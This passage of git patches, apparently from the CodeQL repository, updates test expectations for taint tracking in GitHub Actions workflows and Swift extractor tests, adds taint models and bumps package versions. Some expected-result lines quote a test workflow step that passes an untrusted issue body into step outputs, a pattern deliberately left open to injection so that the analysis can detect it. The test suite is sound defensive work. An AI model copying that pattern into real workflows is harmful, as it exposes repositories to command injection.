@@ -199,6 +199,13 @@ edges | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | provenance | | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | provenance | | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | provenance | | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | 
provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -586,6 +593,15 @@ nodes | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | semmle.label | Uses Step: parse | | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | semmle.label | steps.parse.outputs.payload | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | semmle.label | Run Step: read_issue_body [body] | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | semmle.label | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | semmle.label | Uses Step: parse [data] | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | semmle.label | steps.read_issue_body.outputs.body | +| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 
[value] | From 45b75470163844bba676e54b7ee138980f374bb3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 31 Oct 2024 13:38:38 +0100 Subject: [PATCH 0669/1267] chore: clean up partial.ql debug query --- ql/src/Debug/partial.ql | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index c1578220b6b..cb8ba7873d8 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql @@ -18,9 +18,7 @@ import PartialFlow::PartialPathGraph private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - //source.getLocation().getFile().getBaseName() = "non-existant-test.yml" - source.getLocation().getFile().getBaseName() = "test16.yml" and - source.getLocation().getStartLine() = 125 + source.getLocation().getFile().getBaseName() = "non-existant-test.yml" } predicate isSink(DataFlow::Node sink) { none() } From c6048a6fa1d7bfb558b9b147aaf790b72248d81b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 31 Oct 2024 14:16:56 +0100 Subject: [PATCH 0670/1267] tests: Update tests --- ql/test/library-tests/test.expected | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 8d3e4193c69..a8cf50334ce 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
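Review bot: In partial.ql the debug query is switched off by comparing the base name with the sentinel `"non-existant-test.yml"`, which is misspelled and carries no explanation. A comment such as `// placeholder: set to the workflow file under investigation` would make the intent clear, and spelling the sentinel `non-existent-test.yml` avoids confusion when searching for it. MyConfig continues outside the hunk.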
@@ -1559,6 +1559,7 @@ sources | martinhaintz/ga-file-list | * | output.file_names | filename | manual | | martinhaintz/ga-file-list | * | output.files | filename | manual | | peter-murray/issue-body-parser-action | * | output.* | text | manual | +| peter-murray/issue-forms-body-parser | * | output.payload | text | manual | | potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | | puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | | redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | @@ -1703,6 +1704,7 @@ summaries | tmelliottjr/extract-regex-action | * | input.input | output.resultArray | taint | manual | | tmelliottjr/extract-regex-action | * | input.input | output.resultString | taint | manual | | traversals-analytics-and-intelligence/file-reader-action | * | artifact | output.content | taint | manual | +| zentered/issue-forms-body-parser | * | input.body | output.data | taint | manual | | zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | needs | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | From 230b2ff4d8773354ffc16e82898ac99b605202bd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 31 Oct 2024 14:17:44 +0100 Subject: [PATCH 0671/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f5f8abdce20..d087f03b152 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.82 +version: 0.1.83 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c0f849e1f3e..073ddf5b457 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.82
+version: 0.1.83
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From 1f356078ffba27313907c0b6ac12c64f2385b813 Mon Sep 17 00:00:00 2001
From: Paolo Tranquilli
Date: Thu, 31 Oct 2024 15:57:31 +0100
Subject: [PATCH 0672/1267] Swift: temporarily accept test changes
---
 .../CONSISTENCY/UnresolvedAstNodes.expected | 3 +-
 .../extractor-tests/expressions/all.expected | 3 +-
 .../decl/CapturedDecl/PrintAst.expected | 1 +
 .../decl/MacroDecl/MacroDecl_getRole.expected | 8 +-
 .../decl/MacroDecl/MacroRole.expected | 14 +++-
 .../decl/MacroDecl/MacroRole_getName.expected | 2 +
 .../KeyPathExpr/KeyPathExpr_getRoot.expected | 2 +-
 .../KeyPathExpr/KeyPathExpr_getType.expected | 2 +-
 .../MethodLookupExpr_getType.expected | 4 +-
 .../OpaqueTypeArchetypeType.expected | 2 +-
 ...aqueTypeArchetypeType_getProtocol.expected | 10 ---
 .../PackType/ElementArchetypeType.expected | 2 +-
 .../ElementArchetypeType_getProtocol.expected | 2 +
 .../type/PackType/PackArchetypeType.expected | 3 +-
 .../PackArchetypeType_getProtocol.expected | 4 +
 .../PrimaryArchetypeType.expected | 2 +-
 .../PrimaryArchetypeType_getProtocol.expected | 2 +
 .../test/library-tests/ast/PrintAst.expected | 8 +-
 .../controlflow/graph/Cfg.expected | 15 ++--
 .../dataflow/dataflow/DataFlow.expected | 13 ----
 .../dataflow/dataflow/DataFlowInline.expected | 3 +-
 .../dataflow/taint/core/LocalTaint.expected | 64 ++++++----------
 .../dataflow/taint/core/Taint.expected | 73 -------------------
 .../dataflow/taint/core/TaintInline.expected | 17 ++++-
 .../taint/libraries/TaintInline.expected | 13 +++-
 .../type/nominaltype/nominaltype.expected | 2 +-
 .../type/nominaltype/nominaltypedecl.expected | 2 +-
 .../CWE-020/MissingRegexAnchor.expected | 3 -
 .../Security/CWE-611/XXETest.expected | 18 ++++-
 29 files changed, 121 insertions(+), 176 deletions(-)
diff --git a/swift/ql/test/extractor-tests/errors/CONSISTENCY/UnresolvedAstNodes.expected b/swift/ql/test/extractor-tests/errors/CONSISTENCY/UnresolvedAstNodes.expected index c88a81e5fc7..c777fe0ebb5 100644 --- a/swift/ql/test/extractor-tests/errors/CONSISTENCY/UnresolvedAstNodes.expected +++ b/swift/ql/test/extractor-tests/errors/CONSISTENCY/UnresolvedAstNodes.expected @@ -1,2 +1 @@ -| file://:0:0:0:0 | ... .combine(_:) | -| unresolved.swift:5:1:5:14 | UnresolvedSpecializeExpr | +| unresolved.swift:5:1:5:14 | UnresolvedSpecializeExpr | UnresolvedSpecializeExpr | diff --git a/swift/ql/test/extractor-tests/expressions/all.expected b/swift/ql/test/extractor-tests/expressions/all.expected index bc8fae6529b..0dd7091c1f9 100644 --- a/swift/ql/test/extractor-tests/expressions/all.expected +++ b/swift/ql/test/extractor-tests/expressions/all.expected @@ -6,8 +6,8 @@ | expressions.swift:6:9:6:9 | hello world | StringLiteralExpr | | expressions.swift:7:10:7:10 | "..." | InterpolatedStringLiteralExpr | | expressions.swift:7:10:7:10 | OpaqueValueExpr | OpaqueValueExpr | -| expressions.swift:7:10:7:10 | TapExpr | TapExpr | | expressions.swift:7:10:7:10 | hello | StringLiteralExpr | +| expressions.swift:7:10:7:21 | TapExpr | TapExpr | | expressions.swift:7:11:7:10 | call to appendLiteral(_:) | CallExpr | | expressions.swift:7:11:7:11 | $interpolation | DeclRefExpr | | expressions.swift:7:11:7:11 | &... | InOutExpr | @@ -133,7 +133,6 @@ | expressions.swift:60:1:60:63 | call to withUnsafePointer(to:_:) | CallExpr | | expressions.swift:60:23:60:23 | (Int) ... | LoadExpr | | expressions.swift:60:23:60:23 | myNumber | DeclRefExpr | -| expressions.swift:60:33:60:63 | ((UnsafePointer) throws -> ()) ... | FunctionConversionExpr | | expressions.swift:60:33:60:63 | { ... } | ExplicitClosureExpr | | expressions.swift:60:35:60:35 | unsafeFunction(pointer:) | DeclRefExpr | | expressions.swift:60:35:60:61 | call to unsafeFunction(pointer:) | CallExpr | 
diff --git a/swift/ql/test/extractor-tests/generated/decl/CapturedDecl/PrintAst.expected b/swift/ql/test/extractor-tests/generated/decl/CapturedDecl/PrintAst.expected index d7f64e2a81a..c3ae0bba4c0 100644 --- a/swift/ql/test/extractor-tests/generated/decl/CapturedDecl/PrintAst.expected +++ b/swift/ql/test/extractor-tests/generated/decl/CapturedDecl/PrintAst.expected @@ -251,6 +251,7 @@ closures.swift: # 42| getArgument(2): [Argument] terminator: default terminator # 42| getExpr(): [DefaultArgumentExpr] default terminator # 42| getCapture(0): [CapturedDecl] wrapper(_:) +# 41| getExpr().getFullyConverted(): [FunctionConversionExpr] (@isolated(any) () async -> ()) ... # 45| getElement(1): [CallExpr] call to withCallback(_:) # 45| getFunction(): [DeclRefExpr] withCallback(_:) # 45| getArgument(0): [Argument] : { ... } diff --git a/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroDecl_getRole.expected b/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroDecl_getRole.expected index 0cc8daaa5b8..faa0a6256a6 100644 --- a/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroDecl_getRole.expected +++ b/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroDecl_getRole.expected @@ -1,4 +1,4 @@ -| test.swift:2:1:2:50 | MacroDecl | 0 | test.swift:1:14:1:26 | #freestanding(declaration) | -| test.swift:4:1:4:15 | MacroDecl | 0 | test.swift:3:14:3:25 | #freestanding(expression) | -| test.swift:7:1:7:15 | MacroDecl | 0 | test.swift:6:10:6:20 | @attached(extension) | -| test.swift:7:1:7:15 | MacroDecl | 1 | test.swift:5:10:5:17 | @attached(member) | +| test.swift:2:1:2:50 | MacroDecl | 0 | test.swift:1:2:1:26 | #freestanding(declaration) | +| test.swift:4:1:4:15 | MacroDecl | 0 | test.swift:3:2:3:25 | #freestanding(expression) | +| test.swift:7:1:7:15 | MacroDecl | 0 | test.swift:6:2:6:20 | @attached(extension) | +| test.swift:7:1:7:15 | MacroDecl | 1 | test.swift:5:2:5:17 | @attached(member) | 
diff --git a/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroRole.expected b/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroRole.expected index c83b5e45590..036d4f7ff6e 100644 --- a/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroRole.expected +++ b/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroRole.expected 
@@ -8,7 +8,13 @@ | file://:0:0:0:0 | #freestanding(expression) | getKind: | 1 | getMacroSyntax: | 0 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | | file://:0:0:0:0 | #freestanding(expression) | getKind: | 1 | getMacroSyntax: | 0 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | | file://:0:0:0:0 | #freestanding(expression) | getKind: | 1 | getMacroSyntax: | 0 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | -| test.swift:1:14:1:26 | #freestanding(declaration) | getKind: | 2 | getMacroSyntax: | 0 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | -| test.swift:3:14:3:25 | #freestanding(expression) | getKind: | 1 | getMacroSyntax: | 0 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | -| test.swift:5:10:5:17 | @attached(member) | getKind: | 16 | getMacroSyntax: | 1 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | -| test.swift:6:10:6:20 | @attached(extension) | getKind: | 256 | getMacroSyntax: | 1 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | +| file://:0:0:0:0 | #freestanding(expression) | getKind: | 1 | getMacroSyntax: | 0 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | +| file://:0:0:0:0 | @attached(accessor) | getKind: | 4 | getMacroSyntax: | 1 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | +| file://:0:0:0:0 | @attached(member) | getKind: | 16 | getMacroSyntax: | 1 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | +| file://:0:0:0:0 | @attached(memberAttribute) | getKind: | 8 | getMacroSyntax: | 1 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | +| file://:0:0:0:0 | @attached(peer) | getKind: | 32 | getMacroSyntax: | 1 | getNumberOfConformances: | 0 | getNumberOfNames: | 1 | +| file://:0:0:0:0 | @attached(peer) | getKind: | 32 | getMacroSyntax: | 1 | getNumberOfConformances: | 0 | getNumberOfNames: | 1 | +| test.swift:1:2:1:26 | #freestanding(declaration) | getKind: | 2 | getMacroSyntax: | 0 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | +| test.swift:3:2:3:25 | 
#freestanding(expression) | getKind: | 1 | getMacroSyntax: | 0 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | +| test.swift:5:2:5:17 | @attached(member) | getKind: | 16 | getMacroSyntax: | 1 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | +| test.swift:6:2:6:20 | @attached(extension) | getKind: | 256 | getMacroSyntax: | 1 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | diff --git a/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroRole_getName.expected b/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroRole_getName.expected index e69de29bb2d..0c42bfc4601 100644 --- a/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroRole_getName.expected +++ b/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroRole_getName.expected @@ -0,0 +1,2 @@ +| file://:0:0:0:0 | @attached(peer) | 0 | $() | +| file://:0:0:0:0 | @attached(peer) | 0 | _lldb_summary() | diff --git a/swift/ql/test/extractor-tests/generated/expr/KeyPathExpr/KeyPathExpr_getRoot.expected b/swift/ql/test/extractor-tests/generated/expr/KeyPathExpr/KeyPathExpr_getRoot.expected index 5e391528d7c..4106b8b42fa 100644 --- a/swift/ql/test/extractor-tests/generated/expr/KeyPathExpr/KeyPathExpr_getRoot.expected +++ b/swift/ql/test/extractor-tests/generated/expr/KeyPathExpr/KeyPathExpr_getRoot.expected 
@@ -1,7 +1,7 @@ | key_path_expr.swift:11:12:11:17 | #keyPath(...) | key_path_expr.swift:11:13:11:13 | Foo | | key_path_expr.swift:12:18:12:26 | #keyPath(...) | key_path_expr.swift:12:19:12:23 | [Int] | | key_path_expr.swift:13:19:13:38 | #keyPath(...) | key_path_expr.swift:13:20:13:33 | [String : Int] | -| key_path_expr.swift:14:16:14:35 | #keyPath(...) | key_path_expr.swift:14:17:14:29 | Int? | +| key_path_expr.swift:14:16:14:35 | #keyPath(...) | key_path_expr.swift:14:17:14:29 | Optional | | key_path_expr.swift:15:16:15:26 | #keyPath(...) | key_path_expr.swift:15:17:15:17 | Foo | | key_path_expr.swift:16:20:16:30 | #keyPath(...) | key_path_expr.swift:16:21:16:21 | Foo | | key_path_expr.swift:17:11:17:16 | #keyPath(...) | key_path_expr.swift:17:12:17:12 | Int | diff --git a/swift/ql/test/extractor-tests/generated/expr/KeyPathExpr/KeyPathExpr_getType.expected b/swift/ql/test/extractor-tests/generated/expr/KeyPathExpr/KeyPathExpr_getType.expected index cdf1ac3d9f8..de0945572cf 100644 --- a/swift/ql/test/extractor-tests/generated/expr/KeyPathExpr/KeyPathExpr_getType.expected +++ b/swift/ql/test/extractor-tests/generated/expr/KeyPathExpr/KeyPathExpr_getType.expected @@ -1,7 +1,7 @@ | key_path_expr.swift:11:12:11:17 | #keyPath(...) | WritableKeyPath | | key_path_expr.swift:12:18:12:26 | #keyPath(...) | WritableKeyPath<[Int], Int> | | key_path_expr.swift:13:19:13:38 | #keyPath(...) | WritableKeyPath<[String : Int], Int?> | -| key_path_expr.swift:14:16:14:35 | #keyPath(...) | WritableKeyPath | +| key_path_expr.swift:14:16:14:35 | #keyPath(...) | WritableKeyPath, Int> | | key_path_expr.swift:15:16:15:26 | #keyPath(...) | KeyPath | | key_path_expr.swift:16:20:16:30 | #keyPath(...) | KeyPath | | key_path_expr.swift:17:11:17:16 | #keyPath(...) | WritableKeyPath | 
diff --git a/swift/ql/test/extractor-tests/generated/expr/MethodLookupExpr/MethodLookupExpr_getType.expected b/swift/ql/test/extractor-tests/generated/expr/MethodLookupExpr/MethodLookupExpr_getType.expected index 61f37a4b9a9..7ea638a186c 100644 --- a/swift/ql/test/extractor-tests/generated/expr/MethodLookupExpr/MethodLookupExpr_getType.expected +++ b/swift/ql/test/extractor-tests/generated/expr/MethodLookupExpr/MethodLookupExpr_getType.expected @@ -13,12 +13,12 @@ | method_lookups.swift:37:11:37:11 | X.init() | () -> X | | method_lookups.swift:37:11:37:15 | (no string representation) | (Int) -> () | | method_lookups.swift:37:15:37:15 | .baz(_:) | (Int) -> () | -| method_lookups.swift:40:1:40:1 | Task.init(priority:operation:) | (TaskPriority?, __owned @escaping @Sendable () async -> ()) -> Task<(), Never> | +| method_lookups.swift:40:1:40:1 | Task.init(priority:operation:) | (TaskPriority?, sending @escaping @isolated(any) () async -> ()) -> Task<(), Never> | | method_lookups.swift:41:3:41:5 | .foo(_:_:) | (Int, Int) -> () | | method_lookups.swift:42:9:42:9 | Y.init() | () -> Y | | method_lookups.swift:42:9:42:13 | .baz(_:) | (Int) -> () | | method_lookups.swift:44:11:44:13 | .foo(_:_:) | (Int, Int) -> () | -| method_lookups.swift:47:1:47:1 | Task.init(priority:operation:) | (TaskPriority?, __owned @escaping @Sendable () async -> ()) -> Task<(), Never> | +| method_lookups.swift:47:1:47:1 | Task.init(priority:operation:) | (TaskPriority?, sending @escaping @isolated(any) () async -> ()) -> Task<(), Never> | | method_lookups.swift:48:9:48:11 | .foo(_:_:) | @MainActor (Int, Int) -> () | | method_lookups.swift:49:9:49:11 | .bar() | () -> () | | method_lookups.swift:50:9:50:9 | Z.init() | @MainActor () -> Z | diff --git a/swift/ql/test/extractor-tests/generated/type/OpaqueTypeArchetypeType/OpaqueTypeArchetypeType.expected b/swift/ql/test/extractor-tests/generated/type/OpaqueTypeArchetypeType/OpaqueTypeArchetypeType.expected index 37921db705d..2b14e261f28 100644 
--- a/swift/ql/test/extractor-tests/generated/type/OpaqueTypeArchetypeType/OpaqueTypeArchetypeType.expected +++ b/swift/ql/test/extractor-tests/generated/type/OpaqueTypeArchetypeType/OpaqueTypeArchetypeType.expected @@ -1,4 +1,4 @@ | some Base | getName: | some Base | getCanonicalType: | some Base | getInterfaceType: | \u03c4_1_0 | hasSuperclass: | yes | getNumberOfProtocols: | 0 | getDeclaration: | file://:0:0:0:0 | _ | | some P | getName: | some P | getCanonicalType: | some P | getInterfaceType: | \u03c4_1_0 | hasSuperclass: | no | getNumberOfProtocols: | 1 | getDeclaration: | file://:0:0:0:0 | _ | | some P | getName: | some P | getCanonicalType: | some P | getInterfaceType: | \u03c4_1_0 | hasSuperclass: | no | getNumberOfProtocols: | 1 | getDeclaration: | file://:0:0:0:0 | _ | -| some SignedInteger | getName: | some SignedInteger | getCanonicalType: | some SignedInteger | getInterfaceType: | \u03c4_0_0 | hasSuperclass: | no | getNumberOfProtocols: | 11 | getDeclaration: | file://:0:0:0:0 | _ | +| some SignedInteger | getName: | some SignedInteger | getCanonicalType: | some SignedInteger | getInterfaceType: | \u03c4_0_0 | hasSuperclass: | no | getNumberOfProtocols: | 1 | getDeclaration: | file://:0:0:0:0 | _ | diff --git a/swift/ql/test/extractor-tests/generated/type/OpaqueTypeArchetypeType/OpaqueTypeArchetypeType_getProtocol.expected b/swift/ql/test/extractor-tests/generated/type/OpaqueTypeArchetypeType/OpaqueTypeArchetypeType_getProtocol.expected index 5909813f43d..1ca3b350aeb 100644 --- a/swift/ql/test/extractor-tests/generated/type/OpaqueTypeArchetypeType/OpaqueTypeArchetypeType_getProtocol.expected +++ b/swift/ql/test/extractor-tests/generated/type/OpaqueTypeArchetypeType/OpaqueTypeArchetypeType_getProtocol.expected 
@@ -1,13 +1,3 @@ | some P | 0 | opaque_types.swift:3:1:3:13 | P | | some P | 0 | opaque_types.swift:3:1:3:13 | P | | some SignedInteger | 0 | file://:0:0:0:0 | SignedInteger | -| some SignedInteger | 1 | file://:0:0:0:0 | BinaryInteger | -| some SignedInteger | 2 | file://:0:0:0:0 | SignedNumeric | -| some SignedInteger | 3 | file://:0:0:0:0 | CustomStringConvertible | -| some SignedInteger | 4 | file://:0:0:0:0 | Hashable | -| some SignedInteger | 5 | file://:0:0:0:0 | Numeric | -| some SignedInteger | 6 | file://:0:0:0:0 | Strideable | -| some SignedInteger | 7 | file://:0:0:0:0 | Equatable | -| some SignedInteger | 8 | file://:0:0:0:0 | AdditiveArithmetic | -| some SignedInteger | 9 | file://:0:0:0:0 | ExpressibleByIntegerLiteral | -| some SignedInteger | 10 | file://:0:0:0:0 | Comparable | diff --git a/swift/ql/test/extractor-tests/generated/type/PackType/ElementArchetypeType.expected b/swift/ql/test/extractor-tests/generated/type/PackType/ElementArchetypeType.expected index aa96f769618..5bfa71a3481 100644 --- a/swift/ql/test/extractor-tests/generated/type/PackType/ElementArchetypeType.expected +++ b/swift/ql/test/extractor-tests/generated/type/PackType/ElementArchetypeType.expected @@ -1 +1 @@ -| \u03c4_1_0 | getName: | \u03c4_1_0 | getCanonicalType: | \u03c4_1_0 | getInterfaceType: | \u03c4_1_0 | hasSuperclass: | no | getNumberOfProtocols: | 0 | +| \u03c4_1_0 | getName: | \u03c4_1_0 | getCanonicalType: | \u03c4_1_0 | getInterfaceType: | \u03c4_1_0 | hasSuperclass: | no | getNumberOfProtocols: | 2 | diff --git a/swift/ql/test/extractor-tests/generated/type/PackType/ElementArchetypeType_getProtocol.expected b/swift/ql/test/extractor-tests/generated/type/PackType/ElementArchetypeType_getProtocol.expected index e69de29bb2d..f6d6dae2dc5 100644 --- a/swift/ql/test/extractor-tests/generated/type/PackType/ElementArchetypeType_getProtocol.expected +++ b/swift/ql/test/extractor-tests/generated/type/PackType/ElementArchetypeType_getProtocol.expected 
@@ -0,0 +1,2 @@ +| \u03c4_1_0 | 0 | file://:0:0:0:0 | Copyable | +| \u03c4_1_0 | 1 | file://:0:0:0:0 | Escapable | diff --git a/swift/ql/test/extractor-tests/generated/type/PackType/PackArchetypeType.expected b/swift/ql/test/extractor-tests/generated/type/PackType/PackArchetypeType.expected index 2c6bd59936c..c53f468dc52 100644 --- a/swift/ql/test/extractor-tests/generated/type/PackType/PackArchetypeType.expected +++ b/swift/ql/test/extractor-tests/generated/type/PackType/PackArchetypeType.expected @@ -1 +1,2 @@ -| each T | getName: | each T | getCanonicalType: | each T | getInterfaceType: | each T | hasSuperclass: | no | getNumberOfProtocols: | 0 | +| each Arg | getName: | each Arg | getCanonicalType: | each Arg | getInterfaceType: | each Arg | hasSuperclass: | no | getNumberOfProtocols: | 2 | +| each T | getName: | each T | getCanonicalType: | each T | getInterfaceType: | each T | hasSuperclass: | no | getNumberOfProtocols: | 2 | diff --git a/swift/ql/test/extractor-tests/generated/type/PackType/PackArchetypeType_getProtocol.expected b/swift/ql/test/extractor-tests/generated/type/PackType/PackArchetypeType_getProtocol.expected index e69de29bb2d..7ba05a259c8 100644 --- a/swift/ql/test/extractor-tests/generated/type/PackType/PackArchetypeType_getProtocol.expected +++ b/swift/ql/test/extractor-tests/generated/type/PackType/PackArchetypeType_getProtocol.expected @@ -0,0 +1,4 @@ +| each Arg | 0 | file://:0:0:0:0 | Copyable | +| each Arg | 1 | file://:0:0:0:0 | Escapable | +| each T | 0 | file://:0:0:0:0 | Copyable | +| each T | 1 | file://:0:0:0:0 | Escapable | diff --git a/swift/ql/test/extractor-tests/generated/type/PrimaryArchetypeType/PrimaryArchetypeType.expected b/swift/ql/test/extractor-tests/generated/type/PrimaryArchetypeType/PrimaryArchetypeType.expected index 6bd7bc898e9..2ea99b1e227 100644 --- a/swift/ql/test/extractor-tests/generated/type/PrimaryArchetypeType/PrimaryArchetypeType.expected 
+++ b/swift/ql/test/extractor-tests/generated/type/PrimaryArchetypeType/PrimaryArchetypeType.expected @@ -2,7 +2,7 @@ | Base | getName: | Base | getCanonicalType: | Base | getInterfaceType: | Base | hasSuperclass: | no | getNumberOfProtocols: | 1 | | Base | getName: | Base | getCanonicalType: | Base | getInterfaceType: | Base | hasSuperclass: | yes | getNumberOfProtocols: | 0 | | Base | getName: | Base | getCanonicalType: | Base | getInterfaceType: | Base | hasSuperclass: | yes | getNumberOfProtocols: | 0 | -| Param | getName: | Param | getCanonicalType: | Param | getInterfaceType: | Param | hasSuperclass: | no | getNumberOfProtocols: | 0 | +| Param | getName: | Param | getCanonicalType: | Param | getInterfaceType: | Param | hasSuperclass: | no | getNumberOfProtocols: | 2 | | ParamWithProtocols | getName: | ParamWithProtocols | getCanonicalType: | ParamWithProtocols | getInterfaceType: | ParamWithProtocols | hasSuperclass: | no | getNumberOfProtocols: | 2 | | ParamWithSuperclass | getName: | ParamWithSuperclass | getCanonicalType: | ParamWithSuperclass | getInterfaceType: | ParamWithSuperclass | hasSuperclass: | yes | getNumberOfProtocols: | 0 | | ParamWithSuperclassAndProtocols | getName: | ParamWithSuperclassAndProtocols | getCanonicalType: | ParamWithSuperclassAndProtocols | getInterfaceType: | ParamWithSuperclassAndProtocols | hasSuperclass: | yes | getNumberOfProtocols: | 2 | diff --git a/swift/ql/test/extractor-tests/generated/type/PrimaryArchetypeType/PrimaryArchetypeType_getProtocol.expected b/swift/ql/test/extractor-tests/generated/type/PrimaryArchetypeType/PrimaryArchetypeType_getProtocol.expected index 361f54b556e..3c0810fd7c2 100644 --- a/swift/ql/test/extractor-tests/generated/type/PrimaryArchetypeType/PrimaryArchetypeType_getProtocol.expected +++ b/swift/ql/test/extractor-tests/generated/type/PrimaryArchetypeType/PrimaryArchetypeType_getProtocol.expected 
